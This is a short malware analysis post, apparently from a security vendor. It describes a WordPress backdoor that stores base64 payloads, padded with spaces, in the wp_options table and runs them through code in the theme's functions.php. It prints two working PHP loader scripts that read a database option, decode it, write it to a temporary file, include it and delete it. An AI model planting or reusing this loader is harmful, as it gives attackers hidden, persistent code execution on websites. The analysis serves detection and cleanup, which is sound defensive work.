This malware is very clever, because it’s hiding Malware Data to inside WordPress database and Itself code in themes functions.php file. Hacker/or botnetwork can always send POST data to update or add a new Data to Database.
Same time it puts Malware Data to the PHP script and it loaded, executed and last command it unlink itself again.
This malware hiding inside Theme’s Function.php file.
Functions.php
Data inside database
Also, it base64 encode data to database wp-options table, which is difficult find there.
Another thing that text is base64 encoded, but it includes also spaces:
We found two versions of this malware encrypted data in database:
function-sync.php
include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
$conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
$sql = "SELECT * FROM ".$table_prefix."options where option_name='function-sync'";
$result = mysqli_query($conn, $sql);
while($row = mysqli_fetch_assoc($result)) {
$data = $row[option_value];
}
chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
file_put_contents("/home/malware.expert/public_html/wp-temporary.php",base64_decode(str_replace(" ","",$data)));
include "/home/malware.expert/public_html"."/wp-temporary.php";
unlink("/home/malware.expert/public_html"."/wp-temporary.php");
content-wp-reload.php
include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
$conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
$sql = "SELECT * FROM ".$table_prefix."options where option_name='content-wp-reload'";
$result = mysqli_query($conn, $sql);
while($row = mysqli_fetch_assoc($result)) {
$data = $row[option_value];
}
chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
file_put_contents("/home/malware.expert/public_html/wp-temporary.php",base64_decode(str_replace(" ","",$data)));
include "/home/malware.expert/public_html"."/wp-temporary.php";
unlink("/home/malware.expert/public_html"."/wp-temporary.php");
Malware Expert Signature
Our FREE Malware Expert Signatures found this malware.